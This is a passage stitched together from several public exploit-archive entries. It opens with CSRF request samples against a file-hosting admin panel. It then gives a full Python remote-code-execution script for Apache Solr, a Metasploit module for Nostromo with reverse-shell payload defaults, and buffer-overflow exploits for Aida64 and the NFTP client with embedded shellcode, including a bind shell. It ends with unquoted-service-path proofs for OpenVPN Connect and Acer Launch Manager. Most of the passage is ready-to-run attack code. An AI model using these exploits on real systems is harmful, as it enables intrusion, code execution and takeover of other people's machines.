en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 requesttoken: eRIlHRIBJF0jU1w9CSY+AT8CX18gTh90JV8UQwQdfEg=:JVhMY8G9u7/iKplTfO00k7G5c2BqjoOcCWkAHYdZV5I= OCS-APIREQUEST: true X-Requested-With: XMLHttpRequest Content-Length: 39 Origin: http://192.168.2.111 DNT: 1 Connection: close Cookie: oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe; ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k username=test&password=&email=test@test ################################################################################################################################## # CSRF4 # Delete User DELETE /index.php/settings/users/users/test HTTP/1.1 Host: 192.168.2.111 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate requesttoken: BQ8vIjp9LjACFxwEB2QkMSsuG14kHy4SKio6URckUlk=:6KbrqDMTTsoPE2vdrct1ofvSlGlcyVarSAOFV9PFuLQ= OCS-APIREQUEST: true X-Requested-With: XMLHttpRequest Origin: http://192.168.2.111 DNT: 1 Connection: close Cookie: oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe; ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k ################################################################################################################################## # CSRF5 # Create Group POST /index.php/settings/users/groups HTTP/1.1 Host: 192.168.2.111 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 requesttoken: BRd8ZDsAFREkB0YxdAIaYi8/ABsyCBIDExs/Wgw9a28=:6S14p9vurc5e6TH7vrotyqJBUvihbOXDUWMKYbS23UU= OCS-APIREQUEST: true X-Requested-With: XMLHttpRequest Content-Length: 7 Origin: http://192.168.2.111 DNT: 1 Connection: close Cookie: oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe; ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k id=test ################################################################################################################################## # CSRF6 # Delete Group DELETE /index.php/settings/users/groups/test HTTP/1.1 Host: 192.168.2.111 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate requesttoken: aTElBwBqTAUYEEQacjdgER4hJ0QIA20sdF00CwtHUm0=:ZuhWKS/aNt7N0a2DGlH+Cz5m20b9e5aFOSBKkqJOALw= OCS-APIREQUEST: true X-Requested-With: XMLHttpRequest Origin: http://192.168.2.111 DNT: 1 Connection: close Cookie: oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe; ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k ################################################################################################################################## # CSRF7 # Change User Full Name POST /index.php/settings/users/user/displayName HTTP/1.1 Host: 192.168.2.111 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 requesttoken: fzYYPjtaVBUeKj8CBzojJHIgXTkTTT4GbR0vBT4TCm0=:LrUnpc7qHNLVElqq+m2VX4fG+py7Pa9FK8DpB84dSdY= OCS-APIREQUEST: true X-Requested-With: XMLHttpRequest Content-Length: 37 Origin: http://192.168.2.111 DNT: 1 Connection: close Cookie: oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe; ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k displayName=user1&oldDisplayName=user ################################################################################################################################## # CSRF8 # Change User Email PUT /index.php/settings/users/user/mailAddress HTTP/1.1 Host: 192.168.2.111 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 requesttoken: QAkuGRpIMg88IzsXBTMeYREpCA4zLhcQHiMsQBo7WWo=:sMcIQqQkjGHCGeL4HdgaxWOQXNzrtIjAou6akezvpcI= OCS-APIREQUEST: true X-Requested-With: XMLHttpRequest Content-Length: 31 Origin: http://192.168.2.111 DNT: 1 Connection: close Cookie: oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe; ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k mailAddress=user1%40example.com ################################################################################################################################## # CSRF9 # Change User Password POST /index.php/settings/personal/changepassword HTTP/1.1 Host: 192.168.2.111 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 requesttoken: fwkfaH9zECcMJR4CFS8EZSF5NhseCwkYciMXeVclBB4=:LMR84JsCZAmVWyV0x4YtUrQY4NAK9W75wnR46WsbXbU= OCS-APIREQUEST: true X-Requested-With: XMLHttpRequest Content-Length: 62 Origin: http://192.168.2.111 DNT: 1 Connection: close Cookie: oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe; ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k oldpassword=1234&personal-password=1&personal-password-clone=1 ################################################################################################################################## # CSRF10 # Change Language POST /index.php/settings/ajax/setlanguage.php HTTP/1.1 Host: 192.168.2.111 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 requesttoken: fwkfaH9zECcMJR4CFS8EZSF5NhseCwkYciMXeVclBB4=:LMR84JsCZAmVWyV0x4YtUrQY4NAK9W75wnR46WsbXbU= OCS-APIREQUEST: true X-Requested-With: XMLHttpRequest Content-Length: 7 Origin: http://192.168.2.111 DNT: 1 Connection: close Cookie: oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe; ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k lang=tr ##################################################################################################################################

# Title: Apache Solr 8.2.0 - Remote Code Execution # Date: 2019-11-01 # Author: @l3x_wong # Vendor: https://lucene.apache.org/solr/ # Software Link: https://lucene.apache.org/solr/downloads.html # CVE: N/A # github: https://github.com/AleWong/Apache-Solr-RCE-via-Velocity-template # usage: python3 script.py ip [port [command]] # default port=8983 # default command=whoami # note: # Step1: Init Apache Solr Configuration # Step2: Remote Exec in Every Solr Node import sys import json import time import requests class initSolr(object): timestamp_s = str(time.time()).split('.') timestamp = timestamp_s[0] + timestamp_s[1][0:-3] def __init__(self, ip, port): self.ip = ip self.port = port def get_nodes(self): payload = { '_': self.timestamp, 'indexInfo': 'false', 'wt': 'json' } url = 'http://' + self.ip + ':' + self.port + '/solr/admin/cores' try: nodes_info = requests.get(url, params=payload, timeout=5) node = list(nodes_info.json()['status'].keys()) state = 1 except: node = '' state = 0 if node: return { 'node': node, 'state': state, 'msg': 'Get Nodes Successfully' } else: return { 'node': None, 'state': state, 'msg': 'Get Nodes Failed' } def get_system(self): payload = { '_': self.timestamp, 'wt': 'json' } url = 'http://' + self.ip + ':' + self.port + '/solr/admin/info/system' try: system_info = requests.get(url=url, params=payload, timeout=5) os_name = system_info.json()['system']['name'] os_uname = system_info.json()['system']['uname'] os_version = system_info.json()['system']['version'] state = 1 except: os_name = '' os_uname = '' os_version = '' state = 0 return { 'system': { 'name': os_name, 'uname': os_uname, 'version': os_version, 'state': state } } class apacheSolrRCE(object): def __init__(self, ip, port, node, command): self.ip = ip self.port = port self.node = node self.command = command self.url = "http://" + self.ip + ':' + self.port + '/solr/' + self.node def init_node_config(self): url = self.url + '/config' payload = { 'update-queryresponsewriter': { 'startup': 'lazy', 'name': 'velocity', 'class': 'solr.VelocityResponseWriter', 'template.base.dir': '', 'solr.resource.loader.enabled': 'true', 'params.resource.loader.enabled': 'true' } } try: res = requests.post(url=url, data=json.dumps(payload), timeout=5) if res.status_code == 200: return { 'init': 'Init node config successfully', 'state': 1 } else: return { 'init': 'Init node config failed', 'state': 0 } except: return { 'init': 'Init node config failed', 'state': 0 } def rce(self): url = self.url + ("/select?q=1&&wt=velocity&v.template=custom&v.template.custom=" "%23set($x=%27%27)+" "%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+" "%23set($chr=$x.class.forName(%27java.lang.Character%27))+" "%23set($str=$x.class.forName(%27java.lang.String%27))+" "%23set($ex=$rt.getRuntime().exec(%27" + self.command + "%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+" "%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end") try: res = requests.get(url=url, timeout=5) if res.status_code == 200: try: if res.json()['responseHeader']['status'] == '0': return 'RCE failed @Apache Solr node %s\n' % self.node else: return 'RCE failed @Apache Solr node %s\n' % self.node except: return 'RCE Successfully @Apache Solr node %s\n %s\n' % (self.node, res.text.strip().strip('0')) else: return 'RCE failed @Apache Solr node %s\n' % self.node except: return 'RCE failed @Apache Solr node %s\n' % self.node def check(ip, port='8983', command='whoami'): system = initSolr(ip=ip, port=port) if system.get_nodes()['state'] == 0: print('No Nodes Found. Remote Exec Failed!') else: nodes = system.get_nodes()['node'] systeminfo = system.get_system() os_name = systeminfo['system']['name'] os_version = systeminfo['system']['version'] print('OS Realese: %s, OS Version: %s\nif remote exec failed, ' 'you should change your command with right os platform\n' % (os_name, os_version)) for node in nodes: res = apacheSolrRCE(ip=ip, port=port, node=node, command=command) init_node_config = res.init_node_config() if init_node_config['state'] == 1: print('Init node %s Successfully, exec command=%s' % (node, command)) result = res.rce() print(result) else: print('Init node %s Failed, Remote Exec Failed\n' % node) if __name__ == '__main__': usage = ('python3 script.py ip [port [command]]\n ' '\t\tdefault port=8983\n ' '\t\tdefault command=whoami') if len(sys.argv) == 4: ip = sys.argv[1] port = sys.argv[2] command = sys.argv[3] check(ip=ip, port=port, command=command) elif len(sys.argv) == 3: ip = sys.argv[1] port = sys.argv[2] check(ip=ip, port=port) elif len(sys.argv) == 2: ip = sys.argv[1] check(ip=ip) else: print('Usage: %s:\n' % usage)

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::CmdStager include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Nostromo Directory Traversal Remote Command Execution', 'Description' => %q{ This module exploits a remote command execution vulnerability in Nostromo <= 1.9.6. This issue is caused by a directory traversal in the function `http_verify` in nostromo nhttpd allowing an attacker to achieve remote code execution via a crafted HTTP request. }, 'Author' => [ 'Quentin Kaiser <kaiserquentin[at]gmail.com>', # metasploit module 'sp0re', # original public exploit ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2019-16278'], [ 'URL', 'https://www.sudokaikan.com/2019/10/cve-2019-16278-unauthenticated-remote.html'], ], 'Platform' => ['linux', 'unix'], # OpenBSD, FreeBSD, NetBSD, and Linux 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64, ARCH_MIPSBE, ARCH_MIPSLE, ARCH_ARMLE, ARCH_AARCH64], 'Targets' => [ ['Automatic (Unix In-Memory)', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_memory, 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'} } ], ['Automatic (Linux Dropper)', { 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64, ARCH_MIPSBE, ARCH_MIPSLE, ARCH_ARMLE, ARCH_AARCH64], 'Type' => :linux_dropper, 'DefaultOptions' => {'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'} } ] ], 'DisclosureDate' => 'Oct 20 2019', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } )) register_advanced_options([ OptBool.new('ForceExploit', [false, 'Override check result', false]) ]) end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path), } ) unless res vprint_error("Connection failed") return CheckCode::Unknown end if res.code == 200 and res.headers['Server'] =~ /nostromo [\d.]{5}/ /nostromo (?<version>[\d.]{5})/ =~ res.headers['Server'] if Gem::Version.new(version) <= Gem::Version.new('1.9.6') return CheckCode::Appears end end return CheckCode::Safe end def execute_command(cmd, opts = {}) send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/.%0d./.%0d./.%0d./.%0d./bin/sh'), 'headers' => {'Content-Length:' => '1'}, 'data' => "echo\necho\n#{cmd} 2>&1" } ) end def exploit # These CheckCodes are allowed to pass automatically checkcodes = [ CheckCode::Appears, CheckCode::Vulnerable ] unless checkcodes.include?(check) || datastore['ForceExploit'] fail_with(Failure::NotVulnerable, 'Set ForceExploit to override') end print_status("Configuring #{target.name} target") case target['Type'] when :unix_memory print_status("Sending #{datastore['PAYLOAD']} command payload") vprint_status("Generated command payload: #{payload.encoded}") res = execute_command(payload.encoded) if res && datastore['PAYLOAD'] == 'cmd/unix/generic' print_warning('Dumping command output in full response body') if res.body.empty? print_error('Empty response body, no command output') return end print_line(res.body) end when :linux_dropper print_status("Sending #{datastore['PAYLOAD']} command stager") execute_cmdstager end end end

# Exploit Title: Aida64 6.10.5200 - Buffer Overflow (SEH) # Date: 2019-10-28 # Exploit Author: 8-Team / daejinoh # Vendor Homepage: https://www.aida64.com # Software Link: https://www.aida64.com/downloads/OTAwMmVmNTE= # Version: AIDA64 Enginner 6.10.5200 # Tested on: Windows 7 Home Basic SP1 # CVE : N/A # Step 1) File -> Preferences -> Logging -> Log sensor readings to CSV log file 2) Paste payload from "aida64.txt" -> Apply 3) File -> Exit # Exploit Code #! Python import struct # shell code buf = "" buf += "\x89\xe2\xda\xc3\xd9\x72\xf4\x5e\x56\x59\x49\x49\x49" buf += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43" buf += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41" buf += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" buf += "\x58\x50\x38\x41\x42\x75\x4a\x49\x4f\x4e\x68\x58\x49" buf += "\x67\x59\x34\x58\x38\x6a\x7a\x49\x4b\x78\x59\x42\x54" buf += "\x55\x74\x6c\x34\x66\x38\x65\x63\x6b\x79\x6c\x71\x34" buf += "\x71\x4f\x73\x79\x50\x66\x64\x55\x61\x30\x70\x34\x4f" buf += "\x54\x43\x62\x50\x78\x57\x72\x35\x42\x71\x67\x34\x34" buf += "\x4f\x33\x6b\x4c\x5a\x38\x35\x78\x4f\x35\x6c\x52\x32" buf += "\x76\x30\x49\x6e\x51\x6c\x37\x30\x56\x70\x32\x70\x70" buf += "\x4d\x43\x32\x62\x54\x31\x4c\x37\x56\x43\x76\x50\x6d" buf += "\x68\x57\x73\x7a\x50\x4f\x4f\x72\x52\x70\x59\x70\x6d" buf += "\x79\x4c\x6d\x75\x31\x32\x79\x6b\x39\x4e\x4c\x68\x61" buf += "\x39\x30\x39\x4e\x36\x6e\x48\x58\x73\x5a\x37\x63\x50" buf += "\x4e\x37\x6d\x6f\x66\x4b\x6e\x46\x62\x48\x76\x69\x4c" buf += "\x52\x6d\x38\x33\x33\x43\x6e\x48\x50\x4d\x47\x48\x6a" buf += "\x6f\x67\x4c\x49\x46\x39\x4d\x4e\x67\x75\x6f\x6a\x57" buf += "\x64\x33\x6f\x6c\x36\x79\x69\x47\x33\x42\x51\x61\x47" buf += "\x62\x43\x6e\x72\x4d\x6a\x36\x77\x6f\x75\x78\x45\x56" buf += "\x72\x4c\x48\x6b\x6e\x4b\x5a\x6e\x4d\x6d\x75\x44\x56" buf += "\x67\x54\x6f\x70\x72\x7a\x47\x36\x39\x34\x37\x4f\x44" buf += "\x62\x38\x74\x6c\x6d\x51\x48\x47\x39\x35\x54\x77\x31" buf += "\x46\x6f\x4a\x31\x61\x6f\x4d\x30\x4d\x47\x6c\x48\x71" buf += "\x42\x45\x6f\x5a\x4f\x6d\x69\x46\x4c\x30\x65\x69\x4c" buf += "\x51\x5a\x33\x54\x37\x71\x75\x4e\x55\x56\x42\x43\x6b" buf += "\x65\x4d\x6a\x61\x4e\x4f\x31\x4a\x4b\x42\x47\x30\x4a" buf += "\x4b\x62\x58\x49\x46\x73\x39\x4c\x6f\x39\x71\x50\x4f" buf += "\x4b\x47\x35\x4e\x37\x6d\x6e\x6f\x43\x68\x6b\x4e\x4f" buf += "\x4b\x39\x4b\x33\x44\x4a\x4b\x58\x31\x4e\x61\x32\x32" buf += "\x59\x7a\x77\x34\x6d\x6c\x66\x30\x5a\x4c\x33\x66\x6f" buf += "\x4f\x7a\x64\x6d\x55\x53\x57\x64\x74\x6c\x4b\x5a\x72" buf += "\x73\x47\x6d\x4f\x4b\x58\x34\x6d\x50\x32\x6e\x62\x76" buf += "\x38\x6f\x56\x6f\x6b\x56\x36\x6e\x39\x4e\x4b\x45\x4b" buf += "\x6e\x6d\x77\x6d\x78\x52\x4f\x6f\x71\x34\x49\x4d\x71" buf += "\x31\x6d\x6f\x30\x4c\x4a\x78\x70\x6e\x46\x67\x4d\x6c" buf += "\x6c\x50\x69\x6f\x49\x72\x49\x52\x53\x37\x69\x6f\x54" buf += "\x66\x49\x31\x4b\x76\x4d\x43\x4c\x6b\x56\x68\x42\x4d" buf += "\x76\x74\x33\x79\x76\x35\x41\x41" # Exploit Payload sehNext = struct.pack('<L',0x909010EB) # SHORT JMP sehHandler = struct.pack('<L',0x0120c8b6) # POP POP RET payload = 'A' * (1115 - 4) + sehNext + sehHandler + "\x90" * 16 + buf +"B"*1000 f = open("aida64.txt", "wb") f.write(payload) f.close()

# Exploit Title: OpenVPN Connect 3.0.0.272 - 'ovpnagent' Unquoted Service Path # Discovery by: Luis Martinez # Discovery Date: 2019-11-03 # Vendor Homepage: https://openvpn.net # Software Link : https://openvpn.net/downloads/openvpn-connect-v3-windows.msi # Tested Version: 3.0.0.(272) # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "ovpnconnect" | findstr /i /v """ OpenVPN Agent agent_ovpnconnect agent_ovpnconnect C:\Program Files\OpenVPN Connect\agent_ovpnconnect_1559309046710.exe Auto # Service info: C:\>sc qc agent_ovpnconnect [SC] QueryServiceConfig SUCCESS SERVICE_NAME: agent_ovpnconnect TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\OpenVPN Connect\agent_ovpnconnect_1559309046710.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : OpenVPN Agent agent_ovpnconnect DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: Ayukov NFTP client 1.71 - 'SYST' Buffer Overflow # Date: 2019-11-03 # Exploit Author: Chase Hatch (SYANiDE) # Vendor Homepage: http://ayukov.com/nftp/ # Software Link: ftp://ftp.ayukov.com/pub/nftp/nftp-1.71-i386-win32.exe # Version: 1.71 # Tested on: Windows XP Pro SP0, SP1, SP2, SP3 # CVE : https://nvd.nist.gov/vuln/detail/CVE-2017-15222 # Steps to reproduce: # Run the server with the valid Windows version # Connect the client to the malicious server # bind shell on port 5150 #!/usr/bin/env python2 import os, sys, socket NARGS = len(sys.argv) # ntdll.dll # dllcharacteristics flags: 0x0 (ASLR=no, DEP=no, SEH=yes) # kernel32.dll # dllcharacteristics flags: 0x0 (ASLR=no, DEP=no, SEH=yes) # 7C923A95 FFD6 CALL ESI # Windows XP Pro SP3; ntdll.dll # 7C927543 FFD6 CALL ESI # Windows XP Pro SP2; ntdll.dll # 77E641C7 FFE6 JMP ESI # Windows XP Pro SP1; kernel32.dll # 77E667F3 FFE6 JMP ESI # Windows XP Pro SP0: kernel32.dll tourRETs = { "XPProSP3": "\x95\x3A\x92\x7c", "XPProSP2": "\x43\x75\x92\x7C", "XPProSP1": "\xc7\x41\xe6\x77", "XPProSP0": "\xf3\x67\xe6\x77" } if not NARGS > 1: print("USAGE: %s version" % sys.argv[0]) print("[.] version must be in:") for item in tourRETs: print("\t%s" % item) sys.exit(1) # sploit = "A"*5000 # crash! in SYST cmd, 41414141 in EIP and EBP # ESP and ESI both pointers to somewhere in the As # If I increase the overflow string to 10000, the area ESP points to at crash #, goes from 864 bytes of uninterrupted \x41's to roughly 4056 bytes. # sploit = "A"*10000 # sploit = sys.argv[1] # $(`locate pattern_create.rb|head -n 1` 10000) # 46326846 in EIP # `locate pattern_offset.rb |head -n 1` 46326846 10000 # 4116 sploit = "A"*4116 # Add the return address try: sploit += tourRETs[sys.argv[1]] except KeyError, x: print("[!] Version %s: not a valid version! Possibly bad capitalization" % str(x)) sys.exit(1) sploit += ("\x90"*12) # original calcs based on RET*4... oops. realign. # echo "ibase=16;obase=10;0247CED1 - 0247C834" |bc # 0x69D (1693); ESP-ESI sploit += "\x90"*1693 # leaves 16 nops at jmp/call target before Cs # badchars = "\x00\x0a\x0d" # locate EIP and align ESP to a close future 4 and 16 byte boundary NOTES = """\ $-37 > D9EE FLDZ $-35 > D97424 F4 FSTENV (28-BYTE) PTR SS:[ESP-C] $-31 > 59 POP ECX $-30 > 80C1 09 ADD CL,9 $-2D > 80C1 04 ADD CL,4 $-2A > 80C1 2A ADD CL,2A $-27 > 80C5 01 ADD CH,1 $-24 > 51 PUSH ECX $-23 > 5C POP ESP """ sploit += "\xD9\xEE\xD9\x74\x24\xF4\x59\x80\xc1\x09\x80\xc1\x04" #13 bytes sploit += "\x80\xc1\x2a\x80\xc5\x01\x51\x5c" # 8 bytes sploit += "\x90" * 0x22 # ESP = EIP sploit += "\x90" * 20 # sled for shikata_ga_nai unpack # msfvenom -p windows/shell_bind_tcp LPORT=5150 EXITFUNC=process # -b "\x00\x0a\x0d" -e x86/shikata_ga_nai -i 1 -f c sploit += ( "\xba\xd2\xe1\x61\xb1\xdb\xc6\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1" "\x53\x83\xeb\xfc\x31\x53\x0e\x03\x81\xef\x83\x44\xd9\x18\xc1" "\xa7\x21\xd9\xa6\x2e\xc4\xe8\xe6\x55\x8d\x5b\xd7\x1e\xc3\x57" "\x9c\x73\xf7\xec\xd0\x5b\xf8\x45\x5e\xba\x37\x55\xf3\xfe\x56" "\xd5\x0e\xd3\xb8\xe4\xc0\x26\xb9\x21\x3c\xca\xeb\xfa\x4a\x79" "\x1b\x8e\x07\x42\x90\xdc\x86\xc2\x45\x94\xa9\xe3\xd8\xae\xf3" "\x23\xdb\x63\x88\x6d\xc3\x60\xb5\x24\x78\x52\x41\xb7\xa8\xaa" "\xaa\x14\x95\x02\x59\x64\xd2\xa5\x82\x13\x2a\xd6\x3f\x24\xe9" "\xa4\x9b\xa1\xe9\x0f\x6f\x11\xd5\xae\xbc\xc4\x9e\xbd\x09\x82" "\xf8\xa1\x8c\x47\x73\xdd\x05\x66\x53\x57\x5d\x4d\x77\x33\x05" "\xec\x2e\x99\xe8\x11\x30\x42\x54\xb4\x3b\x6f\x81\xc5\x66\xf8" "\x66\xe4\x98\xf8\xe0\x7f\xeb\xca\xaf\x2b\x63\x67\x27\xf2\x74" "\x88\x12\x42\xea\x77\x9d\xb3\x23\xbc\xc9\xe3\x5b\x15\x72\x68" "\x9b\x9a\xa7\x05\x93\x3d\x18\x38\x5e\xfd\xc8\xfc\xf0\x96\x02" "\xf3\x2f\x86\x2c\xd9\x58\x2f\xd1\xe2\x72\xae\x5c\x04\x10\xde" "\x08\x9e\x8c\x1c\x6f\x17\x2b\x5e\x45\x0f\xdb\x17\x8f\x88\xe4" "\xa7\x85\xbe\x72\x2c\xca\x7a\x63\x33\xc7\x2a\xf4\xa4\x9d\xba" "\xb7\x55\xa1\x96\x2f\xf5\x30\x7d\xaf\x70\x29\x2a\xf8\xd5\x9f" "\x23\x6c\xc8\x86\x9d\x92\x11\x5e\xe5\x16\xce\xa3\xe8\x97\x83" "\x98\xce\x87\x5d\x20\x4b\xf3\x31\x77\x05\xad\xf7\x21\xe7\x07" "\xae\x9e\xa1\xcf\x37\xed\x71\x89\x37\x38\x04\x75\x89\x95\x51" "\x8a\x26\x72\x56\xf3\x5a\xe2\x99\x2e\xdf\x12\xd0\x72\x76\xbb" "\xbd\xe7\xca\xa6\x3d\xd2\x09\xdf\xbd\xd6\xf1\x24\xdd\x93\xf4" "\x61\x59\x48\x85\xfa\x0c\x6e\x3a\xfa\x04" ) # 355 sploit += "C" * (10000 - 4116 - 4 - 12 - 1693 - 13 - 8 - 0x22 - 355 - 20) cases = { "USER": "331 user OK. Pass required", "PASS": "230 OK, current directory is /", # "SYST": "215 UNIX Type: L8", "SYST": sploit, # CRASH! in response to SYST cmd/request, w/"A"*5000, 41414141 in EIP and EBP "TYPE": "200 TYPE is whatever was just requested... \"yeah, ok\"", "SITE UMASK": "500 SITE UMASK is an unknown extension", "CWD": "250 OK, current directory whatever you think it is", "PORT": "200 PORT command successful", "PASV": "227 Entering PASV mode", "LIST": "150 Connecting to whatever port.\r\n226 ASCII\r\n226 Options: -a -l\r\n226 3 matches total" } sx = socket.socket(socket.AF_INET,socket.SOCK_STREAM) sx.bind(("192.168.56.181",21)) sx.listen(5) print("[.] Standing up HostileFTPd v0.0 alpha, port 21") cx,addr = sx.accept() print("[!] Connection received from %s" % str(addr)) cx.send("220 HostileFTPd v0.0 alpha !\r\n") notified = 0 while True: req = cx.recv(1024) for key, resp in cases.items(): if key in req: cx.send(resp + "\r\n") if "SITE UMASK" in req and notified == 0: print("[!] Buffer sent. Bind shell on client's port 5150?") notified = 1 if "PASV" in req: justpause = raw_input("[.] PASV received. Pausing recv buffer") NOTES="""\ ### followed TCP stream in normal client connect to ftp server 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220-You are user number 1 of 50 allowed. 220-Local time is now 13:47. Server port: 21. 220-This is a private system - No anonymous login 220-IPv6 connections are also welcome on this server. 220 You will be disconnected after 15 minutes of inactivity. USER bozo 331 User bozo OK. Password required PASS theclown 230-User bozo has group access to: 1003 230 OK. Current directory is / SYST 215 UNIX Type: L8 TYPE I 200 TYPE is now 8-bit binary SITE UMASK 022 500 SITE UMASK is an unknown extension CWD / 250 OK. Current directory is / PASV 227 Entering Passive Mode (192,168,56,181,183,29) LIST -a 150 Accepted data connection 226-ASCII 226-Options: -a -l 226 3 matches total """

# Title: Launch Manager 6.1.7600.16385 'DsiWMIService' Unquoted Service Path # Author: Gustavo Briseño # Date: 2019-11-03 # Vendor Homepage: https://www.acer.com/ # Software Link: https://global-download.acer.com/GDFiles/Application/LaunchManager/LaunchManager_Dritek_6.1.7600.16385_W7x86W7x64_A.zip?acerid=634193506101268520&Step1=NOTEBOOK&Step2=ASPIRE&Step3=ASPIRE%204333&OS=ALLLC=es&BC=ACER&SC=PA_2#_ga=2.248825730.460116227.1572829430-701800474.1572829429 # Version : Launch Manager 6.1.7600.16385 # Tested on: Windows 7 Home Basic 64bit # CVE : N/A # ===================================================== # 1. Description: # Unquoted service paths in DsiWMIService have an unquoted service path. #PoC =========== C:\>sc qc DsiWMIService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: DsiWMIService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Launch Manager\dsiwmis.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Dritek WMI 